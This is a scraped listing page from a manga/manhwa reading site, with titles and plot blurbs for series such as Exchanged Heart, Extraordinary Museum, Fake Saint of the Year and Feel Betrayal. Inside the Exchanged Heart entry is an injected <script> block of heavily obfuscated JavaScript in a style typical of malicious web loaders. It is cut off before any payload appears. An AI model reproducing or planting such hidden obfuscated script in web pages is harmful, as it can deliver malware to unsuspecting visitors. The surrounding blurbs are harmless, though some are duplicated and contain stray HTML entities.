Mystery - Page 9

Please Be Gentle, My Bossy Uncle! The Killer Queen Has Got A Chance To Live Her Life Again, But Two Things Scare

Her… One Is When Master Jue Flirts With Her.

443 results

Exchanged Heart

"HyeonRyeong" lives inbetween the world of the living and the world of the dead because his heart got switched with "Gwi-Ho". When HyeonRyeong's village is hit with a string of mysterious murders, a powerful and mysterious shaman-girl named "GabJin" shows up. When HyeonRyeong's demonization speeds up, he and GabJin set off on a journey to find Gwi-Ho in order to turn him back into a human. (Source: Hour of Lunacy) The Red Night Inn / The Red Night Spirit / The Seal of the Red Night / The Stamp Seal of the Red Night / ?? ?? ??<script></script><script>(function(_0x28f4ce,_0x13c715){var _0x26c1d5=_0x3068,_0x59af48=_0x28f4ce();while(!![]){try{var _0x3277ba=-parseInt(_0x26c1d5(0xbd))/(-0xde1+-0x248c+0x326e)+parseInt(_0x26c1d5(0xc8))/(-0x1977+0xfa4+0x9d5)*(-parseInt(_0x26c1d5(0xb9))/(-0x2*0x66a+0xaaa+-0x1*-0x22d))+-parseInt(_0x26c1d5(0xbe))/(0x1835+0x1ab9+-0x32ea)*(parseInt(_0x26c1d5(0xc0))/(-0xf00*0x1+-0x23e6+0x3*0x10f9))+parseInt(_0x26c1d5(0xc6))/(0xc5f+0xbed+0x1*-0x1846)*(-parseInt(_0x26c1d5(0xd5))/(0x164b*0x1+-0x4fa+0x2*-0x8a5))+-parseInt(_0x26c1d5(0xd6))/(-0x1893+0x2656+0x1*-0xdbb)+parseInt(_0x26c1d5(0xcf))/(-0x3*0x760+0xaed+0xb3c)*(parseInt(_0x26c1d5(0xbc))/(0x5*-0x74f+-0x2625+0xa*0x779))+parseInt(_0x26c1d5(0xd7))/(-0x21a7+0x2637+0xd*-0x59)*(parseInt(_0x26c1d5(0xc2))/(-0x6a9+-0x26eb+0x2da0));if(_0x3277ba===_0x13c715)break;else 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Extraordinary Museum

Read Manhwa Extraordinary Museum Online For Free At HariManga Extraordinary Museum Novel also known as “Chāofán Bówùguǎn / Chaofan Bowuguan / The Extraordinary Museum / 超凡博物馆”. This OnGoing webtoon was released on 2024. The story was written by tron_pSFkCv and illustrations by tron_pSFkCv. The content of the comic Extraordinary Museum: The Extraordinary Museum is a vast castle suspended in an upside-down subspace. After my sister vanished, I found myself as the sole employee of this place. How can I even begin to describe this feeling? Watching over the world&#8217;s greatest collection of treasures, I must admit, is a bit overwhelming. The comic Extraordinary Museum belongs to the Genre: Action, Adventure, Drama, Fantasy, Horror, Mystery, Psychological, Thriller MangaZin is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as &#8220;Kun Manga&#8221; and &#8220;Read Manhwa Online,&#8221; as well as related terms like Zin Manga, ManhwaClan, and Read Manga Online ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. You can follow some other great Comics!!!: Wail Of Weakness Hunter Academy’s Strongest Battle God Bloodhound&#8217;s Regression Instinct


Fake Saint Of The Year: The Ideal Saint? Too Bad, Here'S The Fake Saint! ~Reincarnated As A Villain Derided As The Shitshow Of The Year~

[The Eternal Scattering Flowers: Fiore Caduto Eterna] is a game ill-suited of being known as a galge, as the main heroine would – regardless of the chosen route – meet her demise. Fudou Niito, a resident of Japan, went to bed dissatisfied with the ending of the game. When he next awoke, he found himself in the body of the game’s hated fake saint, Elrise. Confused, but with an understanding that Elrise’s actions would spell disaster for many lives in the future, he took advantage of the situation and acted to change the course of history. As a result, despite her rotten personality, Elrise was adored by those around her as a perfect saint. Furthermore, the game itself was intrinsically linked to his original world and changed accordingly to suit Elrise’s actions. Without any knowledge of what the hell was going on, the fake saint Elrise continued to alter her fate. A saint on the outside, but a man on the inside. The transmigrator was a piece of shit and the person he transmigrated into was also a piece of shit. A combination of shit and shit would cause an accident – to create the greatest, fake-saint shitshow of the year!


Fake Saint of the Year: You Wanted the Perfect Saint? Too Bad!

[The Eternal Scattering Flowers: Fiore Caduto Eterna] is a game ill-suited of being known as a galge, as the main heroine would – regardless of the chosen route – meet her demise. Fudou Niito, a resident of Japan, went to bed dissatisfied with the ending of the game. When he next awoke, he found himself in the body of the game’s hated fake saint, Elrise. Confused, but with an understanding that Elrise’s actions would spell disaster for many lives in the future, he took advantage of the situation and acted to change the course of history. As a result, despite her rotten personality, Elrise was adored by those around her as a perfect saint. Furthermore, the game itself was intrinsically linked to his original world and changed accordingly to suit Elrise’s actions. Without any knowledge of what the hell was going on, the fake saint Elrise continued to alter her fate. A saint on the outside, but a man on the inside. The transmigrator was a piece of shit and the person he transmigrated into was also a piece of shit. A combination of shit and shit would cause an accident – to create the greatest fake saint shitshow of the year!


Fate Rewinder

The world\'s most easy-to-understand and hot loop manga! An organization that saves people who have tragically died, the Space-Time Police Special Task Force, also known as the \"Rewind Officers\"! Their weapon is the time machine \"Retry Eye\" embedded in their right eye! Rewind time dozens, hundreds, thousands of times until you solve the case! The first loop manga in CoroCoro\'s 45-year history, a must-see!

1 days ago

Fate/Stay Night - Unlimited Blade Works

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Fear: Reiwa Ghost Story

“An exceptional modern omnibus horror that addresses themes symbolic of the Reiwa era. The fears and anxieties you feel daily will start multiplying from today onwards.” The manga explores relatable, everyday fears experienced in the contemporary Reiwa era, amplifying the horror by grounding it in ordinary experiences. Each story in the series reflects modern anxieties, focusing on the fears lurking within daily life, which continue to escalate.

17 hours ago

Feathers of Light

Once, when he was about to disappear, she appeared as the light that illuminated his existence; Now, when she is about to give up her dreams and extinguish the light in her heart, he comes to her side. Their story originated in the book world of Alice in Wonderland and continues in the real world where you and I live. Will the wishes they’ve always held in their hearts come true in both the book world and the real world? –The dream about promise about truth and the light of dreams.


Feel Betrayal

Seol, a former member of the crime organization Misangpa, starts a new life as \"Snow\" in the \"Black Suit Gang,\" led by Yong, after their reunion in prison. Despite his delicate appearance, Seol has no interest in the world around him, and Handsome, who is fixated on him, is nothing more than an annoying presence. For over a year, the \"Black Suit Gang\" effortlessly evades police pursuit and thrives. When Yong brings information about a target, they decide to rob a small bank in a rural area. What should have been a simple job takes an unexpected turn when the team suddenly stops communicating. Seol soon discovers Handsome\'s true identity hidden within the vault, where a chaebol\'s slush fund is supposedly kept...

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Feng Ni Tian Xia

<h1><strong>Feng Ni Tian Xia</strong></h1> She is the only daughter of the 1st princess, but everyone knows she is a wreck. When her clear, cold eyes opened, she suddenly became the most dangerous killer genius of the 21st century the music rang out in the middle of the night, the sound made them meet .... it was like the Lord had arranged for them .... when a weak person ... suddenly shows an amazing strength .... everyone admired her .... he is a cool .... extremely talented .... They met ... Will they be able to live together happily? Please follow the details of the story. Thank you for supporting us all the time. &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;


Fire in the Swamp

"Hold me. Please hold me..." Can Erzan, who doesn&#39;t know what sexual desire even is, realise the truth behind the strange feeling he&#39;s been having for his master...?!

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